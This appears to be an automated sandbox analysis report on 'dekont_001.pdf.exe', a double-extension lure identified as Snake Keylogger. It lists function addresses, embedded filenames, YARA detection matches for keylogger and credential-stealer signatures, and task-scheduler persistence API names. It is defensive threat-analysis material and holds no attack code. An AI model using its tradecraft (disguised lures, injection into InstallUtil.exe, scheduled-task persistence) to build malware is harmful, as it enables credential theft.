Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675EC8	1_2_06675EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667B6D9	1_2_0667B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675EB8	1_2_06675EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06676778	1_2_06676778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667C378	1_2_0667C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06676320	1_2_06676320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06673730	1_2_06673730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06676310	1_2_06676310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667A3F8	1_2_0667A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06676BC1	1_2_06676BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06676BD0	1_2_06676BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066733A8	1_2_066733A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066733B8	1_2_066733B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677049	1_2_06677049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677050	1_2_06677050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06674430	1_2_06674430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06672807	1_2_06672807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670006	1_2_06670006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06672809	1_2_06672809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667D018	1_2_0667D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066708E0	1_2_066708E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066778F0	1_2_066778F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066708F0	1_2_066708F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066774A8	1_2_066774A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066728B0	1_2_066728B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667B08F	1_2_0667B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670488	1_2_06670488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677497	1_2_06677497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670498	1_2_06670498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670D48	1_2_06670D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677D48	1_2_06677D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677D58	1_2_06677D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667BD28	1_2_0667BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670D39	1_2_06670D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06677900	1_2_06677900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667C9C8	1_2_0667C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066781A0	1_2_066781A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066781B0	1_2_066781B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667518A	1_2_0667518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06671191	1_2_06671191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675198	1_2_06675198
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_015CD248	4_2_015CD248
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_015C91C8	4_2_015C91C8
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_015C91B9	4_2_015C91B9
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_015C9850	4_2_015C9850
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_015C9860	4_2_015C9860
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_060C2080	4_2_060C2080
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_060C6DCA	4_2_060C6DCA
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_060C207B	4_2_060C207B
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_075CE2C0	4_2_075CE2C0
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_075B0040	4_2_075B0040
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 4_2_075B0006	4_2_075B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017D6108	7_2_017D6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DC190	7_2_017DC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DF007	7_2_017DF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DB328	7_2_017DB328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017D9540	7_2_017D9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DC470	7_2_017DC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DC752	7_2_017DC752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017D6880	7_2_017D6880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DBBD2	7_2_017DBBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DCA32	7_2_017DCA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017D4AD9	7_2_017D4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DBEB0	7_2_017DBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DE528	7_2_017DE528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DE517	7_2_017DE517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017DB4F2	7_2_017DB4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4B6E8	7_2_06B4B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B48608	7_2_06B48608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4D670	7_2_06B4D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4A408	7_2_06B4A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4BD38	7_2_06B4BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4AA58	7_2_06B4AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4C388	7_2_06B4C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B48BF2	7_2_06B48BF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4B0A0	7_2_06B4B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4D028	7_2_06B4D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B411A0	7_2_06B411A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4C9D8	7_2_06B4C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45EB8	7_2_06B45EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4B6D9	7_2_06B4B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45EC8	7_2_06B45EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45618	7_2_06B45618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B48602	7_2_06B48602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4560A	7_2_06B4560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4D661	7_2_06B4D661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B43730	7_2_06B43730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B46778	7_2_06B46778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4676A	7_2_06B4676A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B474A8	7_2_06B474A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47497	7_2_06B47497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40498	7_2_06B40498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40488	7_2_06B40488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B44430	7_2_06B44430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40D39	7_2_06B40D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4BD28	7_2_06B4BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47D58	7_2_06B47D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40D48	7_2_06B40D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47D48	7_2_06B47D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45A70	7_2_06B45A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45A60	7_2_06B45A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4AA48	7_2_06B4AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B433B8	7_2_06B433B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B433A8	7_2_06B433A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4A3F8	7_2_06B4A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B46BD0	7_2_06B46BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B46BC1	7_2_06B46BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B46320	7_2_06B46320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B46312	7_2_06B46312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4C378	7_2_06B4C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4B08F	7_2_06B4B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B408F0	7_2_06B408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B478F0	7_2_06B478F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B408E0	7_2_06B408E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B42818	7_2_06B42818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4D018	7_2_06B4D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40006	7_2_06B40006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B42807	7_2_06B42807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47050	7_2_06B47050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B40040	7_2_06B40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47049	7_2_06B47049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B481B0	7_2_06B481B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B481A0	7_2_06B481A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B41191	7_2_06B41191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B45198	7_2_06B45198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4518A	7_2_06B4518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B4C9C8	7_2_06B4C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06B47900	7_2_06B47900

Source: dekont_001.pdf.exe	Binary or memory string: OriginalFilename vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHlifwelkrg.exe6 vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000000.1680480879.0000000000B34000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHlifwelkrg.exe6 vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGouuwb.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1760452399.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1770445359.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGouuwb.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGouuwb.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000004022000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe	Binary or memory string: OriginalFilenameHlifwelkrg.exe6 vs dekont_001.pdf.exe

Source: dekont_001.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
